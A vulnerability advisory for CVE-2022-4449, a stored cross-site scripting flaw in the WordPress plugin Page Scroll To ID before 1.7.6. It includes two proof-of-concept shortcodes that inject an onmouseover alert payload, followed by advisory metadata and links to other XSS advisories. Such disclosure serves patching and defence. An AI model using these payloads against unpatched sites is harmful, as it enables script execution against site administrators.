Page Scroll To ID < 1.7.6 – Contributor+ Stored XSS | CVE 2022-4449 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.

Proof of Concept

Put the following shortcodes in a page/post:

1. [ps2id url='#' class='" onmouseover="alert(/XSS/)']ClickMe![/ps2id]

2. [ps2id_wrap id='" onmouseover="alert(/XSS/)']ClickMe![/ps2id_wrap]

The XSS will be triggered when previewing/viewing the related post/page and moving the mouse over the "ClickMe!"  (the theme must be compatible with the plugin, this was tested with Twenty Seventeen).

Affects Plugins

page-scroll-to-id

Fixed in 1.7.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

a4895f8d-5a4c-49cb-b144-b761ed82923d

Timeline

Publicly Published

2022-12-21 (about 1 years ago)

Added

2022-12-21 (about 1 years ago)

Last Updated

2022-12-21 (about 1 years ago)

Other

Published

Title

Published

2023-03-22

Title

Woo Bulk Price Update < 2.2.2 - Reflected XSS

Published

2023-11-24

Title

Salient Core < 2.0.3 - Reflected Cross-Site Scripting

Published

2023-09-27

Title

Save as Image by Pdfcrowd < 2.16.1 - Admin+ Stored XSS

Published

2022-10-10

Title

Rock Convert < 2.11.0 - Admin+ Stored Cross-Site Scripting

Published

2021-12-06

Title

WooCommerce PDF Invoices & Packing Slips < 2.10.5 - Reflected Cross-Site Scripting